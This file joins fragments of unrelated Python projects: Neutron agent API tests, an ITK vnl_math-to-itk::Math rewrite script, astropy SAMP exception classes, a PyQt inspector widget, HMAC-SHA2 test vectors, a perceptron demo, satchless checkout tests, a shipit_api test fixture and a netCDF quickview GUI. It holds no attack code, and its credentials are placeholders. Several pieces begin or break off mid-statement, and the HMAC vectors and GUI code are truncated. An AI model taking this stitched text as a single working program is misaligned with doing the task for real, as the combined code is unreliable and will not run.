        plugin = 'neutron.tests.unit.extensions.test_agent.TestAgentPlugin'
        # for these tests we need to enable overlapping ips
        cfg.CONF.set_default('allow_overlapping_ips', True)
        # Restore the global attribute map after the test mutates it.
        self.useFixture(tools.AttributeMapMemento())
        ext_mgr = AgentTestExtensionManager()
        super(AgentDBTestCase, self).setUp(plugin=plugin, ext_mgr=ext_mgr)
        self.adminContext = context.get_admin_context()

    def test_create_agent(self):
        # Agents cannot be created through the API: expect 400.
        data = {'agent': {}}
        _req = self.new_create_request('agents', data, self.fmt)
        _req.environ['neutron.context'] = context.Context(
            '', 'tenant_id')
        res = _req.get_response(self.ext_api)
        self.assertEqual(res.status_int, exc.HTTPBadRequest.code)

    def test_list_agent(self):
        agents = self._register_agent_states()
        res = self._list('agents')
        self.assertEqual(len(agents), len(res['agents']))

    def test_show_agent(self):
        self._register_agent_states()
        agents = self._list_agents(
            query_string='binary=neutron-l3-agent')
        self.assertEqual(2, len(agents['agents']))
        agent = self._show('agents', agents['agents'][0]['id'])
        self.assertEqual('neutron-l3-agent', agent['agent']['binary'])

    def test_update_agent(self):
        self._register_agent_states()
        agents = self._list_agents(
            query_string='binary=neutron-l3-agent&host=' + L3_HOSTB)
        self.assertEqual(1, len(agents['agents']))
        com_id = agents['agents'][0]['id']
        agent = self._show('agents', com_id)
        new_agent = {}
        new_agent['agent'] = {}
        new_agent['agent']['admin_state_up'] = False
        new_agent['agent']['description'] = 'description'
        self._update('agents', com_id, new_agent)
        agent = self._show('agents', com_id)
        self.assertFalse(agent['agent']['admin_state_up'])
        self.assertEqual('description', agent['agent']['description'])

    def test_dead_agent(self):
        # With a 1s liveness window, sleeping 1.5s makes the agent stale.
        cfg.CONF.set_override('agent_down_time', 1)
        self._register_agent_states()
        time.sleep(1.5)
        agents = self._list_agents(
            query_string='binary=neutron-l3-agent&host=' + L3_HOSTB)
        self.assertFalse(agents['agents'][0]['alive'])
#!/bin/env python
# \author Hans J. Johnson
#
# Prepare for the future by recommending
# use of itk::Math:: functions over
# vnl_math:: functions.
# Rather than converting vnl_math_ to vnl_math::
# this prefers to convert directly to itk::Math::
# namespace.  In cases where vnl_math:: is simply
# an alias to std:: functions, itk::Math directly
# uses the std:: version of the function.
#
# Usage: script.py <path-to-source-file>
# The file is rewritten in place only when a replacement actually occurred.

import os
import sys
from collections import OrderedDict

## slight modification from grep command
# CSV triples: <header placeholder>,<old vnl_math name>,<new itk::Math name>
info_for_conversion="""
XXXX,vnl_math_isnan,itk::Math::isnan
XXXX,vnl_math_isinf,itk::Math::isinf
XXXX,vnl_math_isfinite,itk::Math::isfinite
XXXX,vnl_math_isnormal,itk::Math::isnormal
XXXX,vnl_math_max,std::max
XXXX,vnl_math_min,std::min
XXXX,vnl_math_cuberoot,itk::Math::cbrt
XXXX,vnl_math_hypot,itk::Math::hypot
XXXX,vnl_math_angle_0_to_2pi,itk::Math::angle_0_to_2pi
XXXX,vnl_math_angle_minuspi_to_pi,itk::Math::angle_minuspi_to_pi
XXXX,vnl_math_rnd_halfinttoeven,itk::Math::halfinttoeven
XXXX,vnl_math_rnd_halfintup,itk::Math::rnd_halfintup
XXXX,vnl_math_rnd,itk::Math::rnd
XXXX,vnl_math_floor,itk::Math::floor
XXXX,vnl_math_ceil,itk::Math::ceil
XXXX,vnl_math_abs,itk::Math::abs
XXXX,vnl_math_sqr,itk::Math::sqr
XXXX,vnl_math_cube,itk::Math::cube
XXXX,vnl_math_sgn,itk::Math::sgn
XXXX,vnl_math_sgn0,itk::Math::sgn0
XXXX,vnl_math_squared_magnitude,itk::Math::squared_magnitude
XXXX,vnl_math_remainder_truncated,itk::Math::remainder_truncated
XXXX,vnl_math_remainder_floored,itk::Math::remainder_floored
"""

# Ordered so longer/more specific patterns are applied in insertion order.
ITK_replace_head_names = OrderedDict()      # include-line rewrites
ITK_replace_functionnames = OrderedDict()   # call-site rewrites
ITK_replace_manual = OrderedDict()          # hand-maintained special cases
ITK_replace_manual['"vnl/vnl_math.h"']='"itkMath.h"'
ITK_replace_manual['<vnl/vnl_math.h>']='<itkMath.h>'

for line in info_for_conversion.splitlines():
    linevalues = line.split(",")
    if len(linevalues) != 3:
        #print("SKIPPING: " + str(linevalues))
        continue
    fname=linevalues[0]
    new_name=fname.replace("ITK_","").replace(".h","")
    # Rewrite both quoted and angle-bracket include forms, keeping the old
    # header available behind ITK_LEGACY_FUTURE_REMOVE for compatibility.
    ITK_replace_head_names['#include "{0}"'.format(fname)]="""#if !defined( ITK_LEGACY_FUTURE_REMOVE )
# include "{0}"
#endif
#include <{1}>""".format(fname,new_name)
    ITK_replace_head_names['#include <{0}>'.format(fname)]="""#if !defined( ITK_LEGACY_FUTURE_REMOVE )
# include <{0}>
#endif
#include <{1}>""".format(fname,new_name)

    ITK_pat=linevalues[1]
    new_pat=linevalues[2]
    ITK_replace_functionnames[ITK_pat]=new_pat
    # Need to fix the fact that both std::ios is a base and a prefix
    if "std::ios::" in new_pat:
        ITK_replace_manual[new_pat.replace("std::ios::","std::ios_")] = new_pat

#print(ITK_replace_head_names)
#print(ITK_replace_functionnames)

cfile=sys.argv[1]

file_as_string=""
with open(cfile,"r") as rfp:
    original_string=rfp.read()
    file_as_string=original_string

required_header=""  ## For ITK, this is always empty
for searchval,replaceval in ITK_replace_head_names.items():
    file_as_string_new = file_as_string.replace(searchval,required_header+replaceval)
    if file_as_string_new != file_as_string:
        # A header was rewritten; any required prefix has now been emitted.
        required_header=""
        file_as_string=file_as_string_new

for searchval,replaceval in ITK_replace_functionnames.items():
    file_as_string = file_as_string.replace(searchval,replaceval)

for searchval,replaceval in ITK_replace_manual.items():
    file_as_string = file_as_string.replace(searchval,replaceval)

# Only touch the file on disk when something actually changed.
if file_as_string != original_string:
    print("Processing: {0}".format(cfile))
    with open(cfile,"w") as wfp:
        wfp.write(file_as_string)
else:
    print("SKIPPING: {0}".format(cfile))
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Defines custom errors and exceptions used in `astropy.samp`.
"""

import xmlrpc.client as xmlrpc

from astropy.utils.exceptions import AstropyUserWarning

__all__ = ['SAMPWarning', 'SAMPHubError', 'SAMPClientError', 'SAMPProxyError']


class SAMPWarning(AstropyUserWarning):
    """
    SAMP-specific Astropy warning class
    """


class SAMPHubError(Exception):
    """
    SAMP Hub exception.
    """


class SAMPClientError(Exception):
    """
    SAMP Client exceptions.
    """


class SAMPProxyError(xmlrpc.Fault):
    """
    SAMP Proxy Hub exception
    """
    # NOTE(review): subclassing xmlrpc.Fault presumably lets this error
    # propagate across the XML-RPC boundary as a fault — confirm with callers.
#Author: Miguel Molero <miguel.molero@gmail.com>

from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *

# Glyphs used to render boolean property values.
# NOTE(review): the original code referenced ``c.MARK`` / ``c.CROSS`` but no
# module ``c`` is imported anywhere in this file, so displaying any boolean
# property raised NameError.  Module-level fallbacks are defined here; if a
# project-wide constants module ``c`` exists, import it and use its values
# instead — TODO confirm the intended glyphs.
MARK = u'\u2714'   # check mark
CROSS = u'\u2718'  # cross mark


class ObjectInspectorWidget(QWidget):
    """Widget showing a two-column "Properties" tree for an object.

    The tree is rebuilt from a mapping of property names to values via
    :meth:`update`.
    """

    def __init__(self, parent=None):
        super(ObjectInspectorWidget, self).__init__(parent)
        layout = QVBoxLayout()
        self.tab = QTabWidget()
        self.properties_tree = QTreeWidget()
        self.properties_tree.setHeaderLabels(["", ""])
        self.properties_tree.setAlternatingRowColors(True)
        self.properties_tree.setColumnCount(2)
        # Fixed initial width for the property-name column.
        self.properties_tree.header().resizeSection(0, 200)
        self.tab.addTab(self.properties_tree, "Properties")
        layout.addWidget(self.tab)
        self.setLayout(layout)
        self.setGeometry(0, 0, 100, 400)

    def update(self, props):
        """Rebuild the tree from *props*, a mapping of labels to values.

        NOTE: intentionally shadows ``QWidget.update`` (kept for caller
        compatibility).
        """
        self.properties_tree.clear()
        data_tree = QTreeWidgetItem(self.properties_tree)
        data_tree.setText(0, "Data")
        self.populateTree(data_tree, props.keys(), props.values())

    def populateTree(self, parent, labels, values):
        """Add one child row per (label, value) pair under *parent*.

        ``None`` values are skipped; booleans are rendered with the
        check/cross glyphs, everything else via ``str``.
        """
        for label, value in zip(labels, values):
            if value is None:
                continue
            item = QTreeWidgetItem(parent)
            item.setText(0, label)
            if isinstance(value, bool):
                # Fix: use the module-level glyphs instead of the undefined
                # ``c`` module (NameError in the original).
                item.setText(1, MARK if value else CROSS)
            else:
                item.setText(1, str(value))
        self.properties_tree.expandItem(parent)
t=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B', 'hex', ), mac=codecs.decode( 'E3D249A8' 'CFB67EF8' 'B7A169E9' 'A0A59971' '4A2CECBA' '65999A51' 'BEB8FBBE', 'hex', ), ), TestVector( digestcls=sha2.SHA224, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263', 'hex', ), mac=codecs.decode( '91C52509' 'E5AF8531' '601AE623' '0099D90B' 'EF88AAEF' 'B961F408' '0ABC014D', 'hex', ), ), # SHA-256 based HMACs TestVector( digestcls=sha2.SHA256, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '2425262728292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F', 'hex', ), mac=codecs.decode( '8BB9A1DB' '9806F20DF7F77B82' '138C7914' 'D174D59E' '13DC4D01' '69C9057B' '133E1D62', 'hex', ), ), TestVector( digestcls=sha2.SHA256, text=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '0405060708090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F', 'hex', ), mac=codecs.decode( 'A28CF431' '30EE696A98F14A37' '678B56BC' 'FCBDD9E5' 'CF69717F' 'ECF5480F' '0EBDF790', 'hex', ), ), TestVector( digestcls=sha2.SHA256, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263', 'hex', ), mac=codecs.decode( 'BDCCB6C7' '2DDEADB5' '00AE7683' '86CB38CC' '41C63DBB' '0878DDB9' 'C7A38A43' '1B78378D', 'hex', ), ), # SHA-384 
based HMACs TestVector( digestcls=sha2.SHA384, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '
0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263'
'64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F', 'hex', ), mac=codecs.decode( '63C5DAA5' 'E651847C' 'A897C958' '14AB830B' 'EDEDC7D2' '5E83EEF9' '195CD458' '57A37F44' '8947858F' '5AF50CC2' 'B1B730DD' 'F29671A9', 'hex', ), ), TestVector( digestcls=sha2.SHA384, text=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '1415161718191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F', 'hex', ), mac=codecs.decode( '6EB242BD' 'BB582CA1' '7BEBFA48' '1B1E2321' '1464D2B7' 'F8C20B9FF2201637' 'B93646AF' '5AE9AC31' '6E98DB45' 'D9CAE773' '675EEED0', 'hex', ), ), TestVector( digestcls=sha2.SHA384, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263' '64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F' '80818283' '84858687' '88898A8B' '8C8D8E8F' '90919293' '94959697' '98999A9B' '9C9D9E9F' 'A0A1A2A3' 'A4A5A6A7' 'A8A9AAAB' 'ACADAEAF' 'B0B1B2B3' 'B4B5B6B7' 'B8B9BABB' 'BCBDBEBF' 'C0C1C2C3' 'C4C5C6C7', 'hex', ), mac=codecs.decode( '5B664436' 'DF69B0CA' '22551231' 'A3F0A3D5' 'B4F97991' '713CFA84' 'BFF4D079' '2EFF96C2' '7DCCBBB6' 'F79B65D5' '48B40E85' '64CEF594', 'hex', ), ), # SHA-512 based HMACs TestVector( digestcls=sha2.SHA512, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263' '64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F', 'hex', ), mac=codecs.decode( 'FC25E240' 
'658CA785' 'B7A811A8' 'D3F7B4CA' '48CFA26A' '8A366BF2' 'CD1F836B' '05FCB024' 'BD368530' '81811D6C' 'EA4216EB' 'AD79DA1C' 'FCB95EA4' '586B8A0C' 'E356596A' '55FB1347', 'hex', ), ), TestVector( digestcls=sha2.SHA512, text=b'Sample message for keylen<blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F', 'hex', ), mac=codecs.decode( 'FD44C18B' 'DA0BB0A6' 'CE0E82B0' '31BF2818' 'F6539BD5' '6EC00BDC' '10A8A2D7' '30B3634D' 'E2545D63' '9B0F2CF7' '10D0692C' '72A1896F' '1F211C2B' '922D1A96' 'C392E07E' '7EA9FEDC', 'hex', ), ), TestVector( digestcls=sha2.SHA512, text=b'Sample message for keylen=blocklen', key=codecs.decode( '00010203' '04050607' '08090A0B' '0C0D0E0F' '10111213' '14151617' '18191A1B' '1C1D1E1F' '20212223' '24252627' '28292A2B' '2C2D2E2F' '30313233' '34353637' '38393A3B' '3C3D3E3F' '40414243' '44454647' '48494A4B' '4C4D4E4F' '50515253' '54555657' '58595A5B' '5C5D5E5F' '60616263' '64656667' '68696A6B' '6C6D6E6F' '70717273' '74757677' '78797A7B' '7C7D7E7F' '80818283' '84858687' '88898A8B' '8C8D8E8F' '90919293' '94959697' '98999A9B' '9C9D9E9F' 'A0A1A2A3' 'A4A5
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt


def plot_decision_regions(X, y, clf, res=0.02):
    """Plot *clf*'s decision surface over a grid together with the samples.

    :param X: (n, 2) array of 2-D sample points
    :param y: class labels (any shape; flattened for the colour spec)
    :param clf: object with a ``predict`` method accepting an (m, 2) array
    :param res: grid step used to rasterise the decision surface
    """
    x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
    xx, yy = np.meshgrid(np.arange(x_min, x_max, res),
                         np.arange(y_min, y_max, res))
    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()]).reshape(xx.shape)
    plt.contourf(xx, yy, Z, alpha=0.4)
    # Flatten y so a column vector is accepted as a per-point colour spec.
    plt.scatter(X[:, 0], X[:, 1], c=np.ravel(y), alpha=0.8)
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())


class Perceptron(object):
    """Rosenblatt perceptron trained with the classic online update rule.

    :ivar w_: learned weight vector; ``w_[0]`` is the bias term
    :ivar errors_: number of misclassifications recorded per epoch
    """

    def __init__(self, eta=0.01, epochs=50):
        self.eta = eta          # learning rate
        self.epochs = epochs    # passes over the training set

    def train(self, X, y):
        """Fit the weights on samples ``X`` and targets ``y`` (+1/-1).

        ``y`` may be a flat array or a column vector; it is flattened so the
        per-sample update stays a true scalar (the original code assigned a
        size-1 array into ``w_[0]``, which is deprecated/rejected by modern
        NumPy when ``y`` is a column vector).
        """
        targets = np.ravel(y)
        self.w_ = np.zeros(1 + X.shape[1])
        self.errors_ = []
        for _ in range(self.epochs):
            errors = 0
            for xi, target in zip(X, targets):
                update = self.eta * (target - self.predict(xi))
                self.w_[1:] += update * xi
                self.w_[0] += update
                errors += int(update != 0.0)
            self.errors_.append(errors)
        return self

    def net_input(self, X):
        """Return the raw activation ``w . x + bias``."""
        return np.dot(X, self.w_[1:]) + self.w_[0]

    def predict(self, X):
        """Return the class label (+1 or -1) after the unit step."""
        return np.where(self.net_input(X) >= 0.0, 1, -1)


def main():
    """Train the perceptron on a small toy set and plot the results."""
    # Desired perceptron outputs for this sample set.
    y = np.array([[1], [1], [1], [1], [-1], [-1], [-1], [-1]]).reshape(8, 1)
    # Input samples fed to the perceptron.
    X = np.array([[0, 3], [1, 2], [2, 2], [4, 0],
                  [-1, 2], [2, 0], [3, -1], [4, -1]]).reshape(8, 2)

    ppn = Perceptron(epochs=10, eta=0.1)
    ppn.train(X, y)

    plot_decision_regions(X, y, clf=ppn)
    plt.title('Perceptron')
    plt.xlabel('X')
    plt.ylabel('Y')
    plt.show()

    plt.plot(range(1, len(ppn.errors_) + 1), ppn.errors_, marker='o')
    plt.xlabel('Iterations')
    plt.ylabel('Misclassifications')
    plt.show()


# Guard the demo so importing this module no longer trains and opens plot
# windows as an import side effect.
if __name__ == '__main__':
    main()
# -*- coding: utf-8 -*-
import os

from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import Client

from .....checkout.tests import BaseCheckoutAppTests
from .....delivery.tests import TestDeliveryProvider
from .....order import handler as order_handler
from .....payment import ConfirmationFormNeeded
from .....payment.tests import TestPaymentProvider
from .....pricing import handler as pricing_handler
from .....product import handler as product_handler
from .....product.tests import DeadParrot
from .....product.tests.pricing import FiveZlotyPriceHandler

from ..app import checkout_app
from .....cart.tests import TestCart
from .....order.tests import TestOrder


class TestPaymentProviderWithConfirmation(TestPaymentProvider):
    """Payment provider stub that always demands an external confirmation."""

    def confirm(self, order, typ=None):
        raise ConfirmationFormNeeded(action='http://test.payment.gateway.example.com')


class App(BaseCheckoutAppTests):
    """Integration tests for the checkout app's checkout/confirmation views."""

    checkout_app = checkout_app
    urls = BaseCheckoutAppTests.MockUrls(checkout_app=checkout_app)

    # Billing form data shared by the checkout POST in both tests.
    BILLING_DATA = {'billing_first_name': 'First',
                    'billing_last_name': 'Last',
                    'billing_street_address_1': 'Via Rodeo 1',
                    'billing_city': 'Beverly Hills',
                    'billing_country': 'US',
                    'billing_country_area': 'AZ',
                    'billing_phone': '555-555-5555',
                    'billing_postal_code': '90210'}

    def setUp(self):
        checkout_app.cart_model = TestCart
        checkout_app.order_model = TestOrder
        self.parrot = DeadParrot.objects.create(slug='parrot',
                                                species='Hyacinth Macaw')
        self.dead_parrot = self.parrot.variants.create(color='blue',
                                                       looks_alive=False)
        satchless_dir = os.path.join(os.path.dirname(__file__),
                                     '..', '..', '..', '..')
        self.custom_settings = {
            'SATCHLESS_PRODUCT_VIEW_HANDLERS': ('satchless.cart.add_to_cart_handler',),
            # Fix: the original listed the 'cart' template directory twice;
            # the duplicate entry was redundant and has been removed.
            'TEMPLATE_DIRS': (os.path.join(satchless_dir, 'category', 'templates'),
                              os.path.join(satchless_dir, 'order', 'templates'),
                              os.path.join(satchless_dir, 'cart', 'templates'),
                              os.path.join(os.path.dirname(__file__), 'templates'),
                              os.path.join(os.path.dirname(__file__), '..', 'templates')),
            'TEMPLATE_LOADERS': (
                'django.template.loaders.filesystem.Loader',
            )
        }
        self.original_settings = self._setup_settings(self.custom_settings)
        product_handler.init_queue()
        # Route delivery/payment through the test providers; the payment
        # provider forces the confirmation-form flow exercised below.
        order_handler.delivery_queue = order_handler.DeliveryQueue(TestDeliveryProvider)
        order_handler.payment_queue = order_handler.PaymentQueue(TestPaymentProviderWithConfirmation)
        self.anon_client = Client()
        self.original_pricing_handlers = settings.SATCHLESS_PRICING_HANDLERS
        pricing_handler.pricing_queue = pricing_handler.PricingQueue(FiveZlotyPriceHandler)

    def tearDown(self):
        self._teardown_settings(self.original_settings, self.custom_settings)
        product_handler.init_queue()
        pricing_handler.pricing_queue = pricing_handler.PricingQueue(*self.original_pricing_handlers)

    def _finish_checkout(self, order, delivery_group_forms):
        """POST complete billing + per-group email data to the checkout view.

        Extracted from the two tests below, which duplicated this sequence
        verbatim.  Returns the followed response of the expected 302 POST.
        """
        data = dict(self.BILLING_DATA)
        for group, typ, form in delivery_group_forms:
            data[form.add_prefix('email')] = 'foo@example.com'
        return self._test_status(
            self.checkout_app.reverse('checkout',
                                      kwargs={'order_token': order.token}),
            client_instance=self.anon_client, status_code=302,
            method='post', data=data, follow=True)

    def test_checkout_view_passes_with_correct_data(self):
        cart = self._get_or_create_cart_for_client(self.anon_client)
        cart.replace_item(self.dead_parrot, 1)
        order = self._get_or_create_order_for_client(self.anon_client)
        response = self._test_status(
            reverse('checkout:checkout', kwargs={'order_token': order.token}),
            client_instance=self.anon_client,
            data={'email': 'foo@example.com'})
        dg = response.context['delivery_group_forms']
        response = self._finish_checkout(order, dg)
        # Reload the order to pick up the status change made by the view.
        order = self.checkout_app.order_model.objects.get(pk=order.pk)
        self.assertRedirects(response,
                             reverse('checkout:confirmation',
                                     kwargs={'order_token': order.token}))
        self.assertEqual(order.status, 'payment-pending')

    def test_confirmation_view_redirects_when_order_or_payment_is_missing(self):
        cart = self._get_or_create_cart_for_client(self.anon_client)
        cart.replace_item(self.dead_parrot, 1)
        order = self._get_or_create_order_for_client(self.anon_client)
        # Without a pending payment the confirmation view must redirect away.
        self._test_status(reverse('checkout:confirmation',
                                  kwargs={'order_token': order.token}),
                          client_instance=self.anon_client, status_code=302)
        # Complete the checkout so a payment confirmation becomes available.
        response = self._test_status(
            self.checkout_app.reverse('checkout',
                                      kwargs={'order_token': order.token}),
            client_instance=self.anon_client,
            data={'email': 'foo@example.com'})
        dg = response.context['delivery_group_forms']
        self._finish_checkout(order, dg)
        self._test_status(self.checkout_app.reverse('confirmation',
                                                    kwargs={'order_token': order.token}),
                          client_instance=self.anon_client, status_code=200)
# -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.

import os

import pytest

import backend_common


@pytest.fixture(scope='session')
def app():
    '''Yield a shipit_api Flask application configured for testing.
    '''
    import shipit_api

    # Test-only settings layered on top of the default app config.
    test_settings = {
        'SQLALCHEMY_DATABASE_URI': 'sqlite://',
        'SQLALCHEMY_TRACK_MODIFICATIONS': False,
        'AUTH_CLIENT_ID': 'dummy_id',
        'AUTH_CLIENT_SECRET': 'dummy_secret',
        'AUTH_DOMAIN': 'auth.localhost',
        'AUTH_REDIRECT_URI': 'http://localhost/login',
        'OIDC_USER_INFO_ENABLED': True,
        'OIDC_CLIENT_SECRETS': os.path.join(os.path.dirname(__file__),
                                            'client_secrets.json'),
        'TASKCLUSTER_CLIENT_ID': 'something',
        'TASKCLUSTER_ACCESS_TOKEN': 'something',
    }
    flask_app = shipit_api.create_app(
        backend_common.testing.get_app_config(test_settings))

    with flask_app.app_context():
        backend_common.testing.configure_app(flask_app)
        yield flask_app
faces/embedding_in_qt_sgskip.html from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5 if is_pyqt5(): from matplotlib.backends.backend_qt5agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) else: from matplotlib.backends.backend_qt4agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) from matplotlib.figure import Figure logging.basicConfig(stream=sys.stderr, level=logging.INFO) logger = logging.getLogger('todl_quickview') logger.setLevel(logging.DEBUG) # FP07 Polynom hack T = np.asarray([1.4, 9.01, 20.96, 27.55,34.77]) V = np.asarray([2.95, 2.221, 1.508, 1.26, 1.07]) P = np.polyfit(V,T,2) #print('Polynom',P) #https://stackoverflow.com/questions/18539679/embedding-the-matplotlib-toolbar-in-pyqt4-using-matplotlib-custom-widget#18563884 class MplCanvas(FigureCanvas): def __init__(self): self.fig = Figure() self.ax = self.fig.add_subplot(111) FigureCanvas.__init__(self, self.fig) FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) FigureCanvas.updateGeometry(self) class MplWidget(QtWidgets.QWidget): def __init__(self, parent = None): QtWidgets.QWidget.__init__(self, parent) self.canvas = MplCanvas() self.mpl_toolbar = NavigationToolbar(self.canvas, self) self.vbl = QtWidgets.QVBoxLayout() self.vbl.addWidget(self.canvas) self.vbl.addWidget(self.mpl_toolbar) self.setLayout(self.vbl) class todlquickviewMainWindow(QtWidgets.QMainWindow): """The main interface of the TODL-Quickview gui """ def __init__(self,fname): QtWidgets.QMainWindow.__init__(self) self.all_widgets = [] mainMenu = self.menuBar() self.setWindowTitle("TODL Quickview") #self.setWindowIcon(QtGui.QIcon('logo/pymqdatastream_logo_v0.2.svg.png')) extractAction = QtWidgets.QAction("&Quit", self) extractAction.setShortcut("Ctrl+Q") extractAction.setStatusTip('Closing the program') extractAction.triggered.connect(self.close_application) fileMenu = mainMenu.addMenu('&File') fileMenu.addAction(extractAction) 
self.statusBar() self.mainwidget = todlquickviewWidget(fname) self.setCentralWidget(self.mainwidget) self.width_orig = self.frameGeometry().width() self.height_orig = self.frameGeometry().height() self.width_main = self.width_orig self.height_main = self.height_orig def close_application(self): logger.debug('Goodbye!') self.close() for w in self.mainwidget.plotWidgets: w.close() self.mainwidget.close() class todlquickviewWidget(QtWidgets.QWidget): """ """ def __init__(self,fname=None): QtWidgets.QMainWindow.__init__(self) layout = QtWidgets.QGridLayout() self.plotWidgets = [] self.data = {} self.layout = layout self.setLayout(layout) self.plot_button = QtWidgets.QPushButton('Plot') self.plot_button.clicked.connect(self.plot_data) self.var_combo = QtWidgets.QComboBox(self) self.layout.addWidget(self.var_combo,0,0) self.layout.addWidget(self.plot_button,0,1) if(fname is not None): logger.debug('Opening file:' + fname) self.read_ncfile(fname) self.show() def plot_data(self): print('Plotting') plotvar_y = self.var_combo.currentText() plotdata_y = self.data[plotvar_y][plotvar_y][:] plotdata_x = self.data[plotvar_y]['x0'][:] try: lab_unit = '[' + self.data[plotvar_y][plotvar_y].units + ']' except: lab_unit = '' ylabel = plotvar_y + lab_unit #if('ch1' in plotvar_y): if False: print('Calculating temperature from polynom') plotdata_y = np.polyval(P,plotdata_y) plotdata_y = np.ma.masked_where((plotdata_y > T.max()) | (plotdata_y < T.min()),plotdata_y) #print(T.max(),T.min()) # Calculate the frequency fi = 1/(np.diff(plotdata_x).mean()) plotFrame = MplWidget() ax = plotFrame.canvas.ax plotFrame.canvas.ax.plot(plotdata_x,plotdata_y) ax.set_title('Frequency:' + str(fi)) ax.set_xlabel('t [s]') ax.set_ylabel(ylabel) plotFrame.show() self.plotWidgets.append(plotFrame) def read_ncfile(self,fname): nc = netCDF4.Dataset(fname) # Try to read ADC data try: nca = nc.groups['adc'] except: nca = None pass if(nca is not None): for varname in nca.variables: vartmp = nca.variables[varname] 
print(vartmp) print(vartmp.dimensions[0]) if(not "cnt" in varname): self.data[vartmp.name] = {vartmp.name:vartmp,vartmp.dimensions[0]:nca.variables[vartmp.dimensions[0]]} self.data[vartmp.name]['x0'] = self.data[vartmp.name][vartmp.dimensions[0]] # Add to the gui self.var_combo.addItem(varname) #self.FLAG_CH1=True #print('Found ch1 ADC data') else: print('cnt ...') # Read in PyroScience data print('Trying Firesting data') try: ncp = nc.groups['pyro'] cnt10ks_p = ncp.variables['cnt10ks_pyro'][:] #time_p = netCDF4.num2date(ncp.variables['time'][:],units = ncp.variables['time'].units) fp = 1/(np.diff(cnt10ks_p).mean()) # Add to the gui self.var_combo.addItem('phi') #phi = ncp.variables['phi'][:] # Add to the data self.data['phi'] = {'phi':ncp.variables['phi'],'cnt10ks_p':ncp.variables['cnt10ks_pyro']} self.data['phi']['x0'] = self.data['phi']['cnt10ks_p'] self.FLAG_PYRO=True print('Found Pyro data') except Exception as e: print('Pyro:' + str(e)) self.FLAG_PYRO=False # Read in IMU print('Trying IMU data') try: self.FLAG_IMU = True for g in nc.groups: print(g) if('imu' in g): nci = nc.groups[g] try: cntvar = 'cnt10ks_imu' nci.variables[cntvar][:] except: cntvar = 'cnt10ks' nci.variables[cntvar][:]
cnt10ks_imu = nci.variables[cntvar][:] #time_imu = netCDF4.num2date(nci.variables['time'][:],units=nci.variables['t
